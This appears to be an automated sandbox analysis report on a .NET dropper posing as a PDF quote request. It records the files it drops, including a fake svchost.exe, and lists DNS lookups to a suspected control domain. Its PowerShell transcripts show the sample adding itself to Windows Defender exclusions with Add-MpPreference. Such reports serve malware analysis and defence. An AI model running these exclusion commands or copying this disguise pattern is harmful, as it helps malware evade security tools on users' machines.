Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3aln3cm2.fvg.psm1
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ase23bt1.0jr.psm1
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_um20px0m.b2q.ps1
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wjtgwnqe.3ox.ps1
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview: 1
C:\Users\user\Documents\20210225\PowerShell_transcript.124406._cDteu59.20210225151550.txt
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):880
Entropy (8bit):5.335445416144854
Encrypted:false
SSDEEP:24:BxSAfdZOvBdaFx2DOXUWeSuhPW+HjeTKKjX4CIym1ZJXkuhX:BZKv6FoO+S5+qDYB1ZuC
MD5:FEE84AAAD6A09CC40CDC464593CCB89D
SHA1:6BA52DD0209C9A5D83895F3EE63D8574BFB8A57B
SHA-256:9CCC90B543C28B2AEFA6863D1DB807F29DCCE15390F6C10097EEB985D62DB0E1
SHA-512:C5CDF23B3C171FE82748F220772B041520C0CE2FE9060D8A8C3AEA972F43946BA8EDA05E8725C9DF0F7F3B8CBA229B1B48F468319C53CD338FEE06CDFA6A1188
Malicious:false
Preview: .**********************..Windows PowerShell transcript start..Start time: 20210225151617..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 124406 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe -Force..Process ID: 6736..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210225151618..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe -Force..
C:\Users\user\Documents\20210225\PowerShell_transcript.124406.eRYFyRTS.20210225151530.txt
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):4138
Entropy (8bit):5.444454627353464
Encrypted:false
SSDEEP:96:BZg6FNfoqDo1ZpOZ26FNfoqDo1ZoLP9PzPjZl6FNfoqDo1ZA:k
MD5:D9DB1A3F8EAF271CFDAB2E26568D8D2B
SHA1:967C29FC2B6CC9D9FBD25B3E1041D2631E3AC987
SHA-256:259F5851FDA5298F95BEFB506FF8F7EE1F966D27BE23DEF1CAEA8483B422A36A
SHA-512:857E32BDF165D9B3FD01892C320BF1EC8C8830EE0BF9AC62C2B5B05A33F687C1841E749BC895B264581CC47EACD8758FFF853D6C37026189D737D4A06840BE29
Malicious:false
Preview: .**********************..Windows PowerShell transcript start..Start time: 20210225151545..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 124406 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe -Force..Process ID: 5688..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210225151545..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210225151851..Use
C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe
Process:C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):117936
Entropy (8bit):6.528297707209392
Encrypted:false
SSDEEP:384:UC154NoTCiLdp99RDmmym7mVmLmZm7mDm7vym8mLYiUmXuSHwE7tXuItiR40Xt4W:/zTCiLXBlHzD2pB7lQSVML/hy
MD5:C1B250F45DE606EF95AF9961496402A0
SHA1:A222DA21DBD932D64F9CAD12B46C068AC7360F72
SHA-256:CDB8CF995F8287A1F64CD035C4E34E047E23A3218DBF50B0FCF321ECD464094E
SHA-512:4C09A6D12F85300D45CFDDFEC43A49EBAE676D667FF3B4E86585BB20CA5CF73FB1AB67488D32C66CCE8E9F1DDBD28FC503F187999A93B641BC22A75347530BCC
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 32%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....bE..........."...0.................. ........@.. ....................... ............@.................................L...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........&..T............................................................*..(....*..(....*jr...prR..p~....o....(....*~s ........s!........s.........*Bs....o....o"...*.r...p(.....(#....(#...s....&.(.....(.....(....*...0..........r...pr...p~....o.....s......%r...pr.B.p~....o....o....%rYC.pr...p~....o....o....%r...pr...p~....o....o.....o.....8......(......~....+........o......r?..pr...p~....o....o....,..r...pr...p~....o....r...pr...p~....o....o......rn..pr7..p~....o....r_..pr_..
C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe:Zone.Identifier
Process:C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Preview: [ZoneTransfer]....ZoneId=0
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Process:C:\Windows\System32\svchost.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):55
Entropy (8bit):4.306461250274409
Encrypted:false
SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:DCA83F08D448911A14C22EBCACC5AD57
SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:false
Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                        Static File Info

                                                                                                                                        General

                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Entropy (8bit):6.528297707209392
                                                                                                                                        TrID:
                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                        File name:RFQ - REF 208056-pdf.exe
                                                                                                                                        File size:117936
                                                                                                                                        MD5:c1b250f45de606ef95af9961496402a0
                                                                                                                                        SHA1:a222da21dbd932d64f9cad12b46c068ac7360f72
                                                                                                                                        SHA256:cdb8cf995f8287a1f64cd035c4e34e047e23a3218dbf50b0fcf321ecd464094e
                                                                                                                                        SHA512:4c09a6d12f85300d45cfddfec43a49ebae676d667ff3b4e86585bb20ca5cf73fb1ab67488d32c66cce8e9f1ddbd28fc503f187999a93b641bc22a75347530bcc
                                                                                                                                        SSDEEP:384:UC154NoTCiLdp99RDmmym7mVmLmZm7mDm7vym8mLYiUmXuSHwE7tXuItiR40Xt4W:/zTCiLXBlHzD2pB7lQSVML/hy
                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....bE..........."...0.................. ........@.. ....................... ............@................................

                                                                                                                                        File Icon

                                                                                                                                        Icon Hash:00828e8e8686b000

                                                                                                                                        Static PE Info

                                                                                                                                        General

                                                                                                                                        Entrypoint:0x41cf9e
                                                                                                                                        Entrypoint Section:.text
                                                                                                                                        Digitally signed:true
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        Subsystem:windows gui
                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x85456217 [Wed Nov 7 16:00:23 2040 UTC] (a build date roughly twenty years after the analysis; note that .NET compilers in deterministic mode also write a content hash into this field, so on a managed assembly a nonsense stamp is weak evidence on its own)
                                                                                                                                        TLS Callbacks:
                                                                                                                                        CLR (.Net) Version:v4.0.30319
                                                                                                                                        OS Version Major:4
                                                                                                                                        OS Version Minor:0
                                                                                                                                        File Version Major:4
                                                                                                                                        File Version Minor:0
                                                                                                                                        Subsystem Version Major:4
                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
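
The header fields above (COFF time stamp, entry point, image base, DLL characteristics) and the data directory entries listed further down in this report are all cheap to pull out of the file without a full PE library. The following script is an added example, not part of the original report or of any vendor tooling: it parses just the DOS, COFF and optional headers, flags a time stamp that lies after the analysis date, and reads the CLR and security directory entries. It constructs a minimal PE32 header carrying this sample's reported values instead of reading the real binary; the analysis date (25 Feb 2021, the day after the certificate's Not Before) and the helper names are assumptions.

```python
import struct
from datetime import datetime, timedelta, timezone

# Indices into the optional-header data directory array (PE/COFF spec).
DIR_SECURITY = 4          # Authenticode blob; this entry is a FILE OFFSET, not an RVA
DIR_COM_DESCRIPTOR = 14   # CLR header; non-zero size means a .NET assembly

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
# Assumption: analysis ran on 2021-02-25 00:00 UTC (the day after the cert's Not Before).
REPORT_DATE_UNIX = 1614211200


def parse_pe_header(data):
    """Read the DOS stub, COFF header and optional header of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    machine, nsections, timestamp, _, _, _, characteristics = \
        struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                       # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    pe32 = magic == 0x10B                     # 0x20B would be PE32+
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    if pe32:
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
        ndirs_off = opt + 92
    else:
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
        ndirs_off = opt + 108
    subsystem, dll_characteristics = struct.unpack_from("<HH", data, opt + 68)
    ndirs = struct.unpack_from("<I", data, ndirs_off)[0]
    dirs = [struct.unpack_from("<II", data, ndirs_off + 4 + 8 * i) for i in range(ndirs)]
    return {
        "machine": machine,
        "sections": nsections,
        "timestamp": timestamp,
        "characteristics": characteristics,
        "subsystem": subsystem,
        "dll_characteristics": dll_characteristics,
        "entry_point": image_base + entry_rva,
        "is_dotnet": ndirs > DIR_COM_DESCRIPTOR and dirs[DIR_COM_DESCRIPTOR][1] != 0,
        "has_signature": ndirs > DIR_SECURITY and dirs[DIR_SECURITY][1] != 0,
        "directories": dirs,
    }


def timestamp_verdict(timestamp, analysis_unix):
    """Return (build time as text, 'future' | 'plausible') for a COFF TimeDateStamp."""
    built = EPOCH + timedelta(seconds=timestamp)
    verdict = "future" if timestamp > analysis_unix else "plausible"
    return built.strftime("%Y-%m-%d %H:%M:%S UTC"), verdict


def build_sample_header():
    """Constructed PE32 header with the values this report shows; not the real sample."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<4sHHIIIHH", b"PE\x00\x00",
                       0x14C,        # IMAGE_FILE_MACHINE_I386
                       3,            # .text, .rsrc, .reloc
                       0x85456217,   # TimeDateStamp from the report
                       0, 0,         # no COFF symbol table
                       0xE0,         # SizeOfOptionalHeader for PE32
                       0x0022)       # EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)        # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1CF9E)     # AddressOfEntryPoint (0x41cf9e - 0x400000)
    struct.pack_into("<I", opt, 28, 0x400000)    # ImageBase
    struct.pack_into("<H", opt, 68, 2)           # IMAGE_SUBSYSTEM_WINDOWS_GUI
    struct.pack_into("<H", opt, 70, 0x8540)      # NO_SEH | TERMINAL_SERVER_AWARE | DYNAMIC_BASE | NX_COMPAT
    struct.pack_into("<I", opt, 92, 16)          # NumberOfRvaAndSizes
    directories = {1: (0x1CF4C, 0x4F),           # IMPORT
                   2: (0x1E000, 0x3E0),          # RESOURCE
                   4: (0x1B800, 0x14B0),         # SECURITY (file offset)
                   5: (0x20000, 0xC),            # BASERELOC
                   12: (0x2000, 0x8),            # IAT
                   14: (0x2008, 0x48)}           # COM_DESCRIPTOR
    for idx, (va, size) in directories.items():
        struct.pack_into("<II", opt, 96 + 8 * idx, va, size)
    return bytes(dos) + coff + bytes(opt)


if __name__ == "__main__":
    hdr = parse_pe_header(build_sample_header())
    built, verdict = timestamp_verdict(hdr["timestamp"], REPORT_DATE_UNIX)
    print(f"entry point 0x{hdr['entry_point']:x}, .NET={hdr['is_dotnet']}, "
          f"signed={hdr['has_signature']}, built {built} ({verdict})")
```

The security directory is deliberately kept separate from the RVA-based entries: its first field is a raw file offset, which is why 0x1b800 + 0x14b0 equals this sample's file size of 117936 bytes (the signature is appended after the last section) even though a tool that treats it as an RVA will place it "in .text".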

                                                                                                                                        Authenticode Signature

                                                                                                                                        Signature Valid:false
                                                                                                                                        Signature Issuer:C=pWVehoyZhbqvGvOnyjflC, S=JWVPAYtFJFrnfBtiaEOrjunCnPVqr, L=WBoOmetEMoGEKeXmsi, T=exJgtNaepyEjEdPEBoHdAzLvAPdWgdfvzHhZeCUctUixpYvU, E=AmxNJnQuYxWUhZXLgPdTiT, OU=pmskCxyXHpHOaImSipI, O=TOHpToCMywEdpGEOZenYyaFrGscfYOiOIqiHUSe, CN=cwcpbvBhYEPeJYcCNDldHTnGK
                                                                                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                        Error Number:-2146762487
Not Before:2/24/2021 11:33:07 PM
Not After:2/24/2022 11:33:07 PM
                                                                                                                                        Subject Chain
                                                                                                                                        • C=pWVehoyZhbqvGvOnyjflC, S=JWVPAYtFJFrnfBtiaEOrjunCnPVqr, L=WBoOmetEMoGEKeXmsi, T=exJgtNaepyEjEdPEBoHdAzLvAPdWgdfvzHhZeCUctUixpYvU, E=AmxNJnQuYxWUhZXLgPdTiT, OU=pmskCxyXHpHOaImSipI, O=TOHpToCMywEdpGEOZenYyaFrGscfYOiOIqiHUSe, CN=cwcpbvBhYEPeJYcCNDldHTnGK
                                                                                                                                        Version:3
                                                                                                                                        Thumbprint MD5:8A446DD2BF81F6DCA3F2E70289F260C9
                                                                                                                                        Thumbprint SHA-1:49EC0580239C07DA4FFBA56DC8617A8C94119C69
                                                                                                                                        Thumbprint SHA-256:7C120D01DFB5D8540763A96DEE45DA554BF1373A08AE5E29BB38FB557086D5C7
                                                                                                                                        Serial:19985190B09206952EFD412D3CCC18E2

                                                                                                                                        Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
(the remaining bytes of the entry point preview are zero padding, which disassembles as a run of add byte ptr [eax], al)

The jump target 0x402000 is the single IAT slot (RVA 0x2000, see Data Directories) that holds mscoree.dll!_CorExeMain, the standard native stub of a .NET executable: all real logic lives in managed code, not at the PE entry point.

                                                                                                                                        Data Directories

Name                                   Virtual Address   Virtual Size   Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT           0x0               0x0
IMAGE_DIRECTORY_ENTRY_IMPORT           0x1cf4c           0x4f           .text
IMAGE_DIRECTORY_ENTRY_RESOURCE         0x1e000           0x3e0          .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0               0x0
IMAGE_DIRECTORY_ENTRY_SECURITY         0x1b800           0x14b0         .text
IMAGE_DIRECTORY_ENTRY_BASERELOC        0x20000           0xc            .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG            0x0               0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0               0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0               0x0
IMAGE_DIRECTORY_ENTRY_TLS              0x0               0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0x0               0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0               0x0
IMAGE_DIRECTORY_ENTRY_IAT              0x2000            0x8            .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0               0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x2008            0x48           .text
IMAGE_DIRECTORY_ENTRY_RESERVED         0x0               0x0

Note: the SECURITY entry is a file offset rather than an RVA. 0x1b800 + 0x14b0 = 0x1ccb0 = 117936, the file size, so the Authenticode blob is appended after the last section and is not mapped into .text; the "Is in Section" value for that row comes from treating the offset as an RVA.

                                                                                                                                        Sections

Name     Virtual Address   Virtual Size   Raw Size   Xored PE   ZLIB Complexity   File Type   Entropy          Characteristics
.text    0x2000            0x1afa4        0x1b000    False      0.085765697338    data        6.4427787872     IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc    0x1e000           0x3e0          0x400      False      0.4599609375      data        3.54265996663    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc   0x20000           0xc            0x200      False      0.044921875       data        0.101910425663   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x1e058 | 0x388 | data | English | United States

Imports

DLL | Import
mscoree.dll | _CorExeMain

Version Infos

Description | Data
LegalCopyright | Copyright 2022 LyZnAXxP. All rights reserved.
Assembly Version | 2.8.1.0
InternalName | TEwJVelt.exe
FileVersion | 5.5.3.4
CompanyName | IEACZUBa
LegalTrademarks | VxoadekR
Comments | Ivxoyvzg
ProductName | TEwJVelt
ProductVersion | 2.8.1.0
FileDescription | WFybxfIh
OriginalFilename | TEwJVelt.exe
Translation | 0x0409 0x0514

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                        Feb 25, 2021 15:15:08.924525976 CET5086053192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:15:08.976069927 CET53508608.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:15:09.676964998 CET5045253192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:15:09.735716105 CET53504528.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:15:10.125627995 CET5973053192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:15:10.174272060 CET53597308.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:15:11.383310080 CET5931053192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:15:11.434881926 CET53593108.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:15:35.732686043 CET5191953192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:15:35.781481981 CET53519198.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:15:38.285643101 CET6429653192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:15:38.346791029 CET53642968.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:15:39.182588100 CET5668053192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:15:39.234323978 CET53566808.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:15:48.487034082 CET5882053192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:15:48.544307947 CET53588208.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:15:58.574222088 CET6098353192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:15:58.632570028 CET53609838.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:15:59.755233049 CET4924753192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:15:59.812334061 CET53492478.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:16:57.773159981 CET5228653192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:16:57.824862957 CET53522868.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:03.038863897 CET5606453192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:03.088109970 CET53560648.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:04.075108051 CET6374453192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:04.126898050 CET53637448.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:14.776185989 CET6145753192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:14.844110966 CET53614578.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:15.459316015 CET5836753192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:15.519458055 CET53583678.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:16.013664007 CET6059953192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:16.073896885 CET53605998.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:16.592931032 CET5957153192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:16.653251886 CET53595718.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:17.293025017 CET5268953192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:17.350063086 CET53526898.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:17.738717079 CET5029053192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:17.798995018 CET53502908.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:18.278040886 CET6042753192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:18.335778952 CET53604278.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:18.785022974 CET5620953192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:18.852471113 CET53562098.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:19.402239084 CET5958253192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:19.453866959 CET53595828.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:20.119093895 CET6094953192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:20.176529884 CET53609498.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:20.581614971 CET5854253192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:20.633457899 CET53585428.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:42.674061060 CET5917953192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:42.748486996 CET53591798.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:46.638592958 CET6092753192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:46.687315941 CET53609278.8.8.8192.168.2.7

                                                                                                                                        DNS Queries

                                                                                                                                         Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                                                                                                         Feb 25, 2021 15:14:52.227377892 CET | 192.168.2.7 | 8.8.8.8 | 0xbfac | Standard query (0) | coroloboxorozor.com | A (IP address) | IN (0x0001)
                                                                                                                                         Feb 25, 2021 15:15:48.487034082 CET | 192.168.2.7 | 8.8.8.8 | 0x3f47 | Standard query (0) | coroloboxorozor.com | A (IP address) | IN (0x0001)
                                                                                                                                         Feb 25, 2021 15:15:59.755233049 CET | 192.168.2.7 | 8.8.8.8 | 0x6eb5 | Standard query (0) | coroloboxorozor.com | A (IP address) | IN (0x0001)

                                                                                                                                        DNS Answers

